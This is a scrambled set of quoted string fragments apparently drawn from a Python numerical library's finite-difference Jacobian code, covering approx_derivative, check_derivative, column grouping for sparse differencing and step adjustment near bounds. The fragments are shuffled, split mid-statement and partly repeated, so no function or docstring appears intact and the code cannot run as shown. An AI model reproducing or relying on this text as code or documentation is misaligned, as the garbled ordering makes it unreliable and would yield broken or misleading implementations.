EPS**0.5, \"3-point\": EPS**(1/3),", "violates bound constraints.\") if as_linear_operator: if rel_step is None: rel_step", "is known to have only few non-zero elements in each", "1: raise RuntimeError(\"`fun` return value has \" \"more than 1", "arguments passed to `fun`. Both empty by default. The calling", "(m, n). A zero element means that a corresponding element", "``EPS**(1/s)``, where EPS is machine epsilon for float64 numbers, s=2", "n), matvec) def _dense_difference(fun, x0, f0, h, use_one_sided, method): m", "optional Defines a sparsity structure of the Jacobian matrix. If", "the bounds. For ``method='3-point'`` the sign of `h` is ignored.", "each row contains few non-zero elements. as_linear_operator : bool, optional", "left and right derivative at point 1.0. >>> def g(x):", "``method='3-point'`` the sign of `h` is ignored. If None (default)", "f1[rows] - f2[rows] rows = i[~mask] df[rows] = f2[rows] -", "corresponding element of the Jacobian identically equals to zero. *", "coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n)) return csr_matrix(J) def check_derivative(fun, jac,", "LinearOperator from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find from", "sparse matrix, shape (m, n) Matrix of which to group", "flip or switching to one-sided scheme doesn't allow to take", "returned. If `sparsity` is not None returns a csr_matrix with", "ub = [np.asarray(b, dtype=float) for b in bounds] if lb.ndim", "For example, 2 means that we need to evaluate f(x0", "of truncation and round-off errors, see [1]_. A finite difference", "use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb, ub) elif", "of shape (m, n). A zero element means that a", "fun(x) - f0 # The result is written to columns", "be the same for all variables. Use it to limit", "x0[i] # Recompute dx as exactly representable number. df =", "array. method : {'3-point', '2-point', 'cs'}, optional Finite difference method", "None: rel_step = relative_step[method] sign_x0 = (x0 >= 0).astype(float) *", "x0, method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}):", "at which to estimate the derivatives. Float will be converted", "second order accuracy forward or backward difference near the boundary.", "to the complex plane. Otherwise, produces bogus results. rel_step :", "shape (n,) (never a scalar even if n=1). It must", "allow direct access to individual elements of the matrix. By", "method '%s'. \" % method) x0 = np.atleast_1d(x0) if x0.ndim", "df = f1.imag dx = h_vecs[i, i] else: raise RuntimeError(\"Never", "of Taylor expansion. Refer to [2]_ for the formulas of", "1e-6 or lower, then it is likely that your `jac`", "{None, array_like, sparse matrix, 2-tuple}, optional Defines a sparsity structure", "i, j, _ = find(structure[:, cols]) j = cols[j] mask", "returns a dense array or a sparse matrix depending on", "]) ... >>> >>> x0 = np.array([1.0, 0.5 * np.pi])", "import LinearOperator from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find", "j = cols[j] mask = use_one_sided[j] df = np.empty(m) rows", "`as_linear_operator` is True returns a LinearOperator with shape (m, n).", "difference scheme for '3-point' method is selected automatically. The well-known", "scheme is used for points sufficiently far from the boundary,", "(n,) Adjusted step sizes. Step size decreases only if a", "method): m = f0.size n = x0.size if method ==", "method) x0 = np.atleast_1d(x0) if x0.ndim > 1: raise ValueError(\"`x0`", "with shape (n,). See Also -------- check_derivative : Check correctness", "f0.ndim > 1: raise ValueError(\"`f0` passed has more than 1", "Returns ------- J : {ndarray, sparse matrix, LinearOperator} Finite difference", "return df / dx else: raise RuntimeError(\"Never be here.\") return", "Whether to switch to one-sided scheme. Informative only for ``scheme='2-sided'``.", "if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = h / norm(p)", "Note, that sparse differencing makes sense only for large Jacobian", "and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise ValueError(\"Bounds not supported when", "Journal of the Institute of Mathematics and its Applications, 13", "df = f1.imag dx = h_vec cols, = np.nonzero(e) i,", "or backward difference near the boundary. - 'cs' - use", "{'3-point', '2-point', 'cs'}, optional Finite difference method to use: -", "array_like, optional Lower and upper bounds on independent variables. Defaults", "Permutation array which defines the order of columns enumeration. If", "with `order` used as a random seed. Default is 0,", "ndarray, shape (n,) Desired finite difference steps. num_steps : int", "h_vecs[i] x2 = x0 + h_vecs[i] dx = x2[i] -", "steps in one or both directions are required. In other", "x2[i] - x0[i] f1 = fun(x1) f2 = fun(x2) df", "use a random permutation but guarantee repeatability. Returns ------- groups", "way. b) It clearly separates these two different cases. b)", "np.abs(x0)) def _prepare_bounds(bounds, x0): lb, ub = [np.asarray(b, dtype=float) for", "as a 1-D gradient array with shape (n,). See Also", "representable number. df = fun(x) - f0 elif method ==", "* lower_dist[backward] / num_steps) use_one_sided[backward] = True min_dist = np.minimum(upper_dist,", "elif scheme == '2-sided': h = np.abs(h) use_one_sided = np.zeros_like(h,", "n) Matrix of which to group columns. order : int,", "argument x the same way as `fun`. The return value", "have only few non-zero elements in each row, then it's", "random seed. Default is 0, that is use a random", "array_like of shape (n,) or float Point at which to", "< lower_dist) & ~central h_adjusted[backward] = -np.minimum( h[backward], 0.5 *", ".. [2] <NAME>, <NAME>, and <NAME>, \"On the estimation of", "or ub.shape != x0.shape: raise ValueError(\"Inconsistent shapes between bounds and", "Jacobian matrix is known to have only few non-zero elements", "x = x0 + h_vec dx = x - x0", "method == '3-point' and not use_one_sided[i]: x1 = x0 -", "step is selected automatically, see Notes. f0 : None or", "return np.array([ ... [np.sin(c1 * x[1]), c1 * x[0] *", "each row at least one of them has zero. A", "interpreted as (structure, groups). If None (default), a standard dense", "the same group simultaneously. e = np.equal(group, groups) h_vec =", "raise ValueError(\"Inconsistent shapes between bounds and `x0`.\") if as_linear_operator and", "A single array or a sparse matrix is interpreted as", "elements of the matrix. By default `as_linear_operator` is False. args,", "derivatives. Notes ----- If `rel_step` is not provided, it assigned", "can be analytically continued to the complex plane. Otherwise, produces", "difference approximation. Parameters ---------- fun : callable Function of which", "can be called to get 2-D Jacobian with correct dimensions.", "full step. use_one_sided : ndarray of bool, shape (n,) Whether", "difference scheme. This assumes that the user function is real-valued", "approx_derivative : Compute finite difference approximation of derivative. Examples --------", "non-zero elements in each row, then it's possible to estimate", "most 1 dimension.\") lb, ub = _prepare_bounds(bounds, x0) if lb.shape", "the same group if in each row at least one", "forward and backward difference schemes. For dense differencing when m=1", "== '2-point': x = x0 + h_vec dx = x", "sense only for large Jacobian matrices where each row contains", "use_one_sided h_total = h * num_steps h_adjusted = h.copy() lower_dist", "[1] W. H. Press et. al. \"Numerical Recipes. The Art", "= min_dist[adjusted_central] use_one_sided[adjusted_central] = False return h_adjusted, use_one_sided relative_step =", "return lb, ub def group_columns(A, order=0): \"\"\"Group columns of a", "vector ``p`` of shape (n,), but does not allow direct", "compute left and right derivative at point 1.0. >>> def", "if n=1). It must return 1-D array_like of shape (m,)", "by comparison with a finite difference approximation. Parameters ---------- fun", ": {'3-point', '2-point', 'cs'}, optional Finite difference method to use:", "dx = x - x0 df = fun(x) - f0", "handles a case of gradient computation (m=1) in a conventional", "If `as_linear_operator` is True returns a LinearOperator with shape (m,", "later construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices =", "shape (m, n). For sparse matrices and linear operators it", "+= h_vec[mask_2] dx = np.zeros(n) dx[mask_1] = x2[mask_1] - x0[mask_1]", "method : {'3-point', '2-point', 'cs'}, optional Finite difference method to", "sum of truncation and round-off errors, see [1]_. A finite", "the boundary, and 3-point forward or backward scheme is used", "region of function evaluation. In the example below we compute", "J_diff_data = np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else:", "A = A[:, order] if issparse(A): groups = group_sparse(m, n,", "evaluation. args, kwargs : tuple and dict, optional Additional arguments", "as a sparsity structure, and groups are computed inside the", "on the other hand when n=1 Jacobian is returned with", "Press et. al. \"Numerical Recipes. The Art of Scientific Computing.", "schemes. x1 = x0.copy() x2 = x0.copy() mask_1 = use_one_sided", "= cols[j] elif method == '3-point': # Here we do", "If `sparsity` is not None returns a csr_matrix with shape", "the second order accuracy forward or backward difference near the", "and not use_one_sided[i]: x1 = x0 - h_vecs[i] x2 =", "* x[1])], ... [np.cos(c2 * x[1]), -c2 * x[0] *", "bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute finite difference approximation", "to `fun`. Both empty by default. The calling signature is", "from R^n to R^m, its derivatives form m-by-n matrix called", "_linear_operator_difference(fun_wrapped, x0, f0, rel_step, method) else: h = _compute_absolute_step(rel_step, x0,", "among all relative errors for elements with absolute values higher", "required to implement finite difference scheme. For example, 2 means", "- f0 return df / dx elif method == '3-point':", "not None it is assumed to be equal to ``fun(x0)``,", "from __future__ import division import numpy as np from numpy.linalg", "arguments passed to `fun` and `jac`. Both empty by default.", "np.random.RandomState(order) order = rng.permutation(n) else: order = np.asarray(order) if order.shape", "and s=3 for '3-point' method. Such relative step approximately minimizes", "np.zeros_like(p)): return np.zeros(m) dx = h / norm(p) x =", "None, a random permutation is used with `order` used as", "minimizes a sum of truncation and round-off errors, see [1]_.", "norm(p) x = x0 + dx*p*1.j f1 = fun(x) df", "must return 1-D array_like of shape (m,) or a scalar.", "scipy.optimize import approx_derivative >>> >>> def f(x, c1, c2): ...", "as exactly representable number. df = fun(x) - f0 elif", "x0.size J_transposed = np.empty((n, m)) h_vecs = np.diag(h) for i", "of function evaluation. args, kwargs : tuple and dict, optional", "`scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense array or a sparse", "large Jacobian matrices where each row contains few non-zero elements.", "approx_derivative(g, x0, bounds=(-np.inf, 1.0)) array([ 1.]) >>> approx_derivative(g, x0, bounds=(1.0,", "np.diag(h) for i in range(h.size): if method == '2-point': x", "to perturbed # variables. cols, = np.nonzero(e) # Find all", "i, j, _ = find(structure[:, cols]) j = cols[j] else:", "will be converted to 1-D array. bounds : 2-tuple of", "backward scheme is used for points near the boundary. Both", "* np.cos(c2 * x[1])]) ... >>> x0 = np.array([1.0, 0.5", "array_like, optional Relative step size to use. The absolute step", "\"\"\" if issparse(A): A = csc_matrix(A) else: A = np.atleast_2d(A)", "accuracy in terms of Taylor expansion. Refer to [2]_ for", "find(structure[:, cols]) j = cols[j] mask = use_one_sided[j] df =", "lower_dist) & ~fitting h_adjusted[backward] = -lower_dist[backward] / num_steps elif scheme", "(n,) Whether to switch to one-sided scheme. Informative only for", "use_one_sided : ndarray of bool, shape (n,) Whether to switch", "lb, ub): \"\"\"Adjust final difference scheme to the presence of", "= np.equal(group, groups) h_vec = h * e if method", "method) if method == '2-point': h, use_one_sided = _adjust_scheme_to_bounds( x0,", "finite difference approximation of derivative. Examples -------- >>> import numpy", "* structure : array_like or sparse matrix of shape (m,", "* np.pi]) >>> approx_derivative(f, x0, args=(1, 2)) array([[ 1., 0.],", "fun(x1) f2 = fun(x2) df = f2 - f1 elif", "csr_matrix, coo_matrix, find from ._group_columns import group_dense, group_sparse EPS =", "found groups. Each value ``groups[i]`` is an index of a", "Default is None. bounds : tuple of array_like, optional Lower", "for group in range(n_groups): # Perturb variables which are in", "ub - x0 if scheme == '1-sided': x = x0", "shape (m, n) is returned. If `sparsity` is not None", "and backward difference schemes. For dense differencing when m=1 Jacobian", "the same but separate one-sided # and two-sided schemes. x1", "EPS is machine epsilon for float64 numbers, s=2 for '2-point'", "!= 2: raise ValueError(\"`A` must be 2-dimensional.\") m, n =", "or backward scheme is used for points near the boundary.", "of `h` steps in one direction required to implement finite", "is always returned as a 2-D structure, for ndarrays, if", "csc_matrix(A) else: A = np.atleast_2d(A) A = (A != 0).astype(np.int32)", "of a function computing derivatives (Jacobian or gradient) by comparison", "h, method): m = f0.size n = x0.size if method", "an element (i, j) is a partial derivative of f[i]", "full array. j = cols[j] elif method == '3-point': #", "num_steps) use_one_sided[forward] = True backward = (upper_dist < lower_dist) &", "matrix is interpreted as a sparsity structure, and groups are", "switch to one-sided scheme. Informative only for ``scheme='2-sided'``. \"\"\" if", "order.shape != (n,): raise ValueError(\"`order` has incorrect shape.\") A =", "for the formulas of 3-point forward and backward difference schemes.", "group columns. order : int, iterable of int with shape", "return LinearOperator((m, n), matvec) def _dense_difference(fun, x0, f0, h, use_one_sided,", "but separate one-sided # and two-sided schemes. x1 = x0.copy()", "2.4492935982947064e-16 \"\"\" J_to_test = jac(x0, *args, **kwargs) if issparse(J_to_test): J_diff", "def _linear_operator_difference(fun, x0, f0, h, method): m = f0.size n", "= (A != 0).astype(np.int32) if A.ndim != 2: raise ValueError(\"`A`", "same for `jac`. Returns ------- accuracy : float The maximum", "Computing. 3rd edition\", sec. 5.7. .. [2] <NAME>, <NAME>, and", "passed to `fun` and `jac`. Both empty by default. The", "applies to forward and backward schemes, '2-sided' applies to center", "/ dx[j]) row_indices = np.hstack(row_indices) col_indices = np.hstack(col_indices) fractions =", "in this case the ``fun(x0)`` is not called. Default is", "_sparse_difference(fun, x0, f0, h, use_one_sided, structure, groups, method): m =", "1-D gradient array with shape (n,). See Also -------- check_derivative", "h = _compute_absolute_step(rel_step, x0, method) if method == '2-point': h,", "dx = np.zeros(n) dx[mask_1] = x2[mask_1] - x0[mask_1] dx[mask_2] =", "& (upper_dist >= h_total) forward = (upper_dist >= lower_dist) &", "'1-sided': x = x0 + h_total violated = (x <", "/ dx else: raise RuntimeError(\"Never be here.\") return LinearOperator((m, n),", "rows = i[mask] df[rows] = -3 * f0[rows] + 4", "find(structure[:, cols]) j = cols[j] else: raise ValueError(\"Never be here.\")", "elements with absolute values higher than 1 and absolute errors", "complex plane. Otherwise, produces bogus results. rel_step : None or", "= x - x0 df = fun(x) - f0 #", "h_adjusted : ndarray, shape (n,) Adjusted step sizes. Step size", "find(structure[:, cols]) # Restore column indices in the full array.", "f(x0 + 2 * h) or f(x0 - 2 *", "interpreted as a sparsity structure, and groups are computed inside", "f = np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim > 1: raise", "method is selected automatically. The well-known central difference scheme is", "function is ndarray of shape (n,) (never a scalar even", "``J.dot(p)`` for any vector ``p`` of shape (n,), but does", "derivative at point 1.0. >>> def g(x): ... return x**2", "derivative. Examples -------- >>> import numpy as np >>> from", "* f1 - f2 elif method == '3-point' and not", "to have only few non-zero elements in each row, then", "a sparsity structure of the Jacobian matrix. If the Jacobian", "step approximately minimizes a sum of truncation and round-off errors,", "second-order accuracy in terms of Taylor expansion. Refer to [2]_", "or lower, then it is likely that your `jac` implementation", "A.ndim != 2: raise ValueError(\"`A` must be 2-dimensional.\") m, n", "_prepare_bounds(bounds, x0) if lb.shape != x0.shape or ub.shape != x0.shape:", "j) is a partial derivative of f[i] with respect to", "upper_dist = ub - x0 if scheme == '1-sided': x", "s=2 for '2-point' method and s=3 for '3-point' method. Such", "a group to which ith column assigned. The procedure was", "lb.ndim == 0: lb = np.resize(lb, x0.shape) if ub.ndim ==", "permutation is used with `order` used as a random seed.", "None or array_like, optional If not None it is assumed", "s=3 for '3-point' method. Such relative step approximately minimizes a", "-------- >>> import numpy as np >>> from scipy.optimize import", "= f0.size n = x0.size row_indices = [] col_indices =", "default. The calling signature is ``fun(x, *args, **kwargs)`` and the", "/ num_steps backward = (upper_dist < lower_dist) & ~fitting h_adjusted[backward]", "int Number of `h` steps in one direction required to", ">= lower_dist) & ~central h_adjusted[forward] = np.minimum( h[forward], 0.5 *", "by a single function evaluation [3]_. To perform such economic", "return _linear_operator_difference(fun_wrapped, x0, f0, rel_step, method) else: h = _compute_absolute_step(rel_step,", "(n,). A column grouping for a given sparsity structure, use", "and backward schemes, '2-sided' applies to center schemes. lb :", "['2-point', '3-point', 'cs']: raise ValueError(\"Unknown method '%s'. \" % method)", "to use. The absolute step size is computed as ``h", "a complex-step finite difference scheme. This assumes that the user", "else x ... >>> x0 = 1.0 >>> approx_derivative(g, x0,", "x0.size row_indices = [] col_indices = [] fractions = []", "# Here we do conceptually the same but separate one-sided", "j, _ = find(structure[:, cols]) j = cols[j] mask =", "x0, bounds=(-np.inf, np.inf), args=(), kwargs={}): \"\"\"Check correctness of a function", "... >>> x0 = np.array([1.0, 0.5 * np.pi]) >>> approx_derivative(f,", "linear operators it is always returned as a 2-D structure,", "c1, c2): ... return np.array([ ... [np.sin(c1 * x[1]), c1", "is a partial derivative of f[i] with respect to x[j].", "& ~central h_adjusted[forward] = np.minimum( h[forward], 0.5 * upper_dist[forward] /", "it returns a dense array or sparse matrix depending on", ": callable Function which computes Jacobian matrix of `fun`. It", "rel_step is None: rel_step = relative_step[method] sign_x0 = (x0 >=", "* e if method == '2-point': x = x0 +", "is ignored. If None (default) then step is selected automatically,", "then it's possible to estimate its several columns by a", "it to limit the range of function evaluation. Bounds checking", "the same for `jac`. Returns ------- accuracy : float The", "is ``fun(x, *args, **kwargs)``. Returns ------- J : {ndarray, sparse", "f1[rows] elif method == 'cs': f1 = fun(x0 + h_vec*1.j)", "example, 2 means that we need to evaluate f(x0 +", "!= x0.shape: raise ValueError(\"Inconsistent shapes between bounds and `x0`.\") if", "epsilon for float64 numbers, s=2 for '2-point' method and s=3", "h_vecs[i] x2 = x0 + 2 * h_vecs[i] dx =", "finite difference scheme. This assumes that the user function is", "= relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0, rel_step, method) else: h", "limit the range of function evaluation. args, kwargs : tuple", "(m, n) Matrix of which to group columns. order :", "default. The calling signature is ``fun(x, *args, **kwargs)``. Returns -------", "i, j, abs_err_data = find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel() return", "bounds : tuple of array_like, optional Lower and upper bounds", "== 2: structure, groups = sparsity else: structure = sparsity", "two-sided schemes. x1 = x0.copy() x2 = x0.copy() mask_1 =", "column assigned. The procedure was helpful only if n_groups is", "optional When True the function returns an `scipy.sparse.linalg.LinearOperator`. Otherwise it", "J : {ndarray, sparse matrix, LinearOperator} Finite difference approximation of", "allow to take a full step. use_one_sided : ndarray of", "see Notes. f0 : None or array_like, optional If not", "of Jacobian. i, j, _ = find(structure[:, cols]) # Restore", "issparse(A): A = csc_matrix(A) else: A = np.atleast_2d(A) A =", "(default) then step is selected automatically, see Notes. f0 :", "single array or a sparse matrix is interpreted as a", "<NAME>, <NAME>, and <NAME>, \"On the estimation of sparse Jacobian", "group_sparse(m, n, A.indices, A.indptr) else: groups = group_dense(m, n, A)", "(x0 > ub)): raise ValueError(\"`x0` violates bound constraints.\") if as_linear_operator:", "to zero. * groups : array_like of shape (n,). A", "0, that is use a random permutation but guarantee repeatability.", "element of the Jacobian identically equals to zero. * groups", "np.zeros(n) dx[mask_1] = x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2] -", "f2 elif method == '3-point' and not use_one_sided[i]: x1 =", "a case of gradient computation (m=1) in a conventional way.", "h_vec cols, = np.nonzero(e) i, j, _ = find(structure[:, cols])", "shape (m, n) Matrix of which to group columns. order", "Recipes. The Art of Scientific Computing. 3rd edition\", sec. 5.7.", "x0.size if method == '2-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)):", "to forward and backward schemes, '2-sided' applies to center schemes.", "m)) h_vecs = np.diag(h) for i in range(h.size): if method", "matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = 2*h /", "The calling signature is ``fun(x, *args, **kwargs)``. Returns ------- J", "difference scheme is used for points sufficiently far from the", "1 dimension.\") lb, ub = _prepare_bounds(bounds, x0) if lb.shape !=", "A) groups[order] = groups.copy() return groups def approx_derivative(fun, x0, method='3-point',", "c2): ... return np.array([ ... [np.sin(c1 * x[1]), c1 *", "= [] col_indices = [] fractions = [] n_groups =", "approx_derivative >>> >>> def f(x, c1, c2): ... return np.array([x[0]", "return _sparse_difference(fun_wrapped, x0, f0, h, use_one_sided, structure, groups, method) def", "x - x0 df = fun(x) - f0 # The", "= fun(x2) df = f2 - f1 elif method ==", "sparsity is None: return _dense_difference(fun_wrapped, x0, f0, h, use_one_sided, method)", "== '2-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx", "as `fun`. The return value must be array_like or sparse", "The procedure was helpful only if n_groups is significantly less", "the bound will be the same for all variables. Use", "of bounds. Parameters ---------- x0 : ndarray, shape (n,) Point", "f2 = fun(x2) df = -3.0 * f0 + 4", "x0 + 2 * h_vecs[i] dx = x2[i] - x0[i]", "evaluate f(x0 + 2 * h) or f(x0 - 2", "boundary. Both schemes have the second-order accuracy in terms of", "-------- check_derivative : Check correctness of a function computing derivatives.", "sign flip or switching to one-sided scheme doesn't allow to", "h_vecs[i, i] else: raise RuntimeError(\"Never be here.\") J_transposed[i] = df", "4 * f1[rows] - f2[rows] rows = i[~mask] df[rows] =", "x0 + (dx/2)*p f1 = fun(x1) f2 = fun(x2) df", "to x[j]. Parameters ---------- fun : callable Function of which", "-------- approx_derivative : Compute finite difference approximation of derivative. Examples", "fun(x2) df = -3.0 * f0 + 4 * f1", "f1 - f2 elif method == '3-point' and not use_one_sided[i]:", "scalar even if n=1). It must return 1-D array_like of", "as np from numpy.linalg import norm from scipy.sparse.linalg import LinearOperator", "boundary. - 'cs' - use a complex-step finite difference scheme.", "to construct groups. Parameters ---------- A : array_like or sparse", "empty by default. The calling signature is ``fun(x, *args, **kwargs)``.", "value has \" \"more than 1 dimension.\") return f if", "# The result is written to columns which correspond to", "``fun(x, *args, **kwargs)`` and the same for `jac`. Returns -------", "np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = 2*h / norm(p) x1", "accuracy forward or backward difference near the boundary. - 'cs'", "'cs': f1 = fun(x0 + h_vec*1.j) df = f1.imag dx", "Jacobian is returned with a shape (m, 1). Our motivation", "or backward difference. - '3-point' - use central difference in", "of a 2-D matrix for sparse finite differencing [1]_. Two", "approximation of derivative. Examples -------- >>> import numpy as np", "zero. * groups : array_like of shape (n,). A column", "= np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else: J_diff", "returned with a shape (n,), on the other hand when", "only few non-zero elements in each row, then it's possible", "= 1.0 >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0)) array([ 1.]) >>>", "np.resize(lb, x0.shape) if ub.ndim == 0: ub = np.resize(ub, x0.shape)", "Institute of Mathematics and its Applications, 13 (1974), pp. 117-120.", "= f1.imag dx = h_vec cols, = np.nonzero(e) i, j,", "== '2-sided': h = np.abs(h) use_one_sided = np.zeros_like(h, dtype=bool) else:", "if issparse(J_to_test): J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs)", "if np.all((lb == -np.inf) & (ub == np.inf)): return h,", "None it is assumed to be equal to ``fun(x0)``, in", ": ndarray, shape (n,) Adjusted step sizes. Step size decreases", "argument x passed to this function is ndarray of shape", "h, 1, '1-sided', lb, ub) elif method == '3-point': h,", "a conventional way. b) It clearly separates these two different", "= sparsity else: structure = sparsity groups = group_columns(sparsity) if", "# and two-sided schemes. x1 = x0.copy() x2 = x0.copy()", "= f2[rows] - f1[rows] elif method == 'cs': f1 =", "assigned. The procedure was helpful only if n_groups is significantly", "be converted to a 1-D array. method : {'3-point', '2-point',", "groups). If None (default), a standard dense differencing will be", "'3-point': # Here we do conceptually the same but separate", "= find(structure[:, cols]) j = cols[j] else: raise ValueError(\"Never be", "if rel_step is None: rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped, x0,", "*args, **kwargs)``. Returns ------- J : {ndarray, sparse matrix, LinearOperator}", "of `h` is ignored. If None (default) then step is", "group if in each row at least one of them", "np.nonzero(e) i, j, _ = find(structure[:, cols]) j = cols[j]", "other hand when n=1 Jacobian is returned with a shape", "f0 = fun_wrapped(x0) else: f0 = np.atleast_1d(f0) if f0.ndim >", "than 1 dimension.\") return f if f0 is None: f0", "or a scalar. jac : callable Function which computes Jacobian", "with a shape (m, 1). Our motivation is the following:", "from scipy.sparse.linalg import LinearOperator from ..sparse import issparse, csc_matrix, csr_matrix,", "function evaluation. args, kwargs : tuple and dict, optional Additional", "= fun(x2) df = f2 - f1 return df /", "= np.hstack(col_indices) fractions = np.hstack(fractions) J = coo_matrix((fractions, (row_indices, col_indices)),", "and np.all(np.isinf(ub))): raise ValueError(\"Bounds not supported when \" \"`as_linear_operator` is", "is assumed to be equal to ``fun(x0)``, in this case", "------- J : {ndarray, sparse matrix, LinearOperator} Finite difference approximation", "is correct. See Also -------- approx_derivative : Compute finite difference", "difference approximation of derivative. Examples -------- >>> import numpy as", "forward or backward difference. - '3-point' - use central difference", "scheme, lb, ub): \"\"\"Adjust final difference scheme to the presence", "to ``EPS**(1/s)``, where EPS is machine epsilon for float64 numbers,", "sparse Jacobian matrices\", Journal of the Institute of Mathematics and", "computing ``J.dot(p)`` for any vector ``p`` of shape (n,), but", "groups.copy() return groups def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None, bounds=(-np.inf,", ".. [3] <NAME>, \"Generation of Finite Difference Formulas on Arbitrarily", "13 (1974), pp. 117-120. .. [3] <NAME>, \"Generation of Finite", "f2 = fun(x2) df = f2 - f1 elif method", "computed inside the function. A tuple is interpreted as (structure,", "1988. Examples -------- >>> import numpy as np >>> from", "True backward = (upper_dist < lower_dist) & ~central h_adjusted[backward] =", "calling signature is ``fun(x, *args, **kwargs)``. Returns ------- J :", "/ norm(p) x1 = x0 - (dx/2)*p x2 = x0", "and len(sparsity) == 2: structure, groups = sparsity else: structure", "is None: return _dense_difference(fun_wrapped, x0, f0, h, use_one_sided, method) else:", "> 1: raise ValueError(\"`f0` passed has more than 1 dimension.\")", "supported when \" \"`as_linear_operator` is True.\") def fun_wrapped(x): f =", "to compute the fraction. We store i, j and #", "= x[i] - x0[i] # Recompute dx as exactly representable", "return 1-D array_like of shape (m,) or a scalar. x0", "= upper_dist[forward] / num_steps backward = (upper_dist < lower_dist) &", "is ndarray of shape (n,) (never a scalar even if", "x0.ndim > 1: raise ValueError(\"`x0` must have at most 1", "at which we wish to estimate derivative. h : ndarray,", "with correct dimensions. References ---------- .. [1] W. H. Press", "If `sparsity` is None then a ndarray with shape (m,", "ValueError(\"Inconsistent shapes between bounds and `x0`.\") if as_linear_operator and not", "a) It handles a case of gradient computation (m=1) in", "array which defines the order of columns enumeration. If int", "Jacobian matrix. If the Jacobian matrix is known to have", "raise ValueError(\"`order` has incorrect shape.\") A = A[:, order] if", "from scipy.optimize import check_derivative >>> >>> >>> def f(x, c1,", "if m == 1: J_transposed = np.ravel(J_transposed) return J_transposed.T def", "+ h_vecs[i] x2 = x0 + 2 * h_vecs[i] dx", "which correspond to perturbed # variables. cols, = np.nonzero(e) #", "= (upper_dist >= lower_dist) & ~central h_adjusted[forward] = np.minimum( h[forward],", "take a full step. use_one_sided : ndarray of bool, shape", "_dense_difference(fun, x0, f0, h, use_one_sided, method): m = f0.size n", "int, iterable of int with shape (n,) or None Permutation", "mask_2 = ~use_one_sided & e x1[mask_2] -= h_vec[mask_2] x2[mask_2] +=", "selected automatically. The well-known central difference scheme is used for", "col_indices = np.hstack(col_indices) fractions = np.hstack(fractions) J = coo_matrix((fractions, (row_indices,", "x0, h, 1, '1-sided', lb, ub) elif method == '3-point':", "2 * h_vec[mask_1] mask_2 = ~use_one_sided & e x1[mask_2] -=", "Relative step size to use. The absolute step size is", "cols]) j = cols[j] else: raise ValueError(\"Never be here.\") #", "Otherwise, produces bogus results. rel_step : None or array_like, optional", "args, kwargs : tuple and dict, optional Additional arguments passed", "fun_wrapped(x): f = np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim > 1:", "(m,) or a scalar. x0 : array_like of shape (n,)", "matrix, shape (m, n) Matrix of which to group columns.", "find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data)))", "written to columns which correspond to perturbed # variables. cols,", "return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds, x0):", "\"Generation of Finite Difference Formulas on Arbitrarily Spaced Grids\", Mathematics", "fun : callable Function of which to estimate the derivatives.", "is True returns a LinearOperator with shape (m, n). Otherwise", "cols]) # Restore column indices in the full array. j", "else: structure = sparsity groups = group_columns(sparsity) if issparse(structure): structure", "order : int, iterable of int with shape (n,) or", "more than 1 dimension.\") if np.any((x0 < lb) | (x0", "x >= 1 else x ... >>> x0 = 1.0", "the derivatives. Float will be converted to a 1-D array.", "bounds on independent variables. ub : ndarray, shape (n,) Upper", "to limit the range of function evaluation. Bounds checking is", "the function returns an `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense", "matrix, 2-tuple}, optional Defines a sparsity structure of the Jacobian", "issparse, csc_matrix, csr_matrix, coo_matrix, find from ._group_columns import group_dense, group_sparse", "x0.shape: raise ValueError(\"Inconsistent shapes between bounds and `x0`.\") if as_linear_operator", "h * e if method == '2-point': x = x0", "x[1])] ... ]) ... >>> >>> x0 = np.array([1.0, 0.5", "below we compute left and right derivative at point 1.0.", "which are in the same group simultaneously. e = np.equal(group,", "operator provides an efficient way of computing ``J.dot(p)`` for any", ">>> def f(x, c1, c2): ... return np.array([x[0] * np.sin(c1", "'cs': f1 = fun(x0 + h_vecs[i]*1.j) df = f1.imag dx", "method == '2-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m)", "_ = find(structure[:, cols]) j = cols[j] mask = use_one_sided[j]", "one-sided scheme. Informative only for ``scheme='2-sided'``. \"\"\" if scheme ==", "passed to this function is ndarray of shape (n,) (never", "x1[i] f1 = fun(x1) f2 = fun(x2) df = f2", "= np.minimum( h[forward], 0.5 * upper_dist[forward] / num_steps) use_one_sided[forward] =", "n = x0.size J_transposed = np.empty((n, m)) h_vecs = np.diag(h)", "+ h_vecs[i]*1.j) df = f1.imag dx = h_vecs[i, i] else:", "(n,): raise ValueError(\"`order` has incorrect shape.\") A = A[:, order]", "(x0 >= 0).astype(float) * 2 - 1 return rel_step *", ".. [1] W. H. Press et. al. \"Numerical Recipes. The", "0.5 * lower_dist[backward] / num_steps) 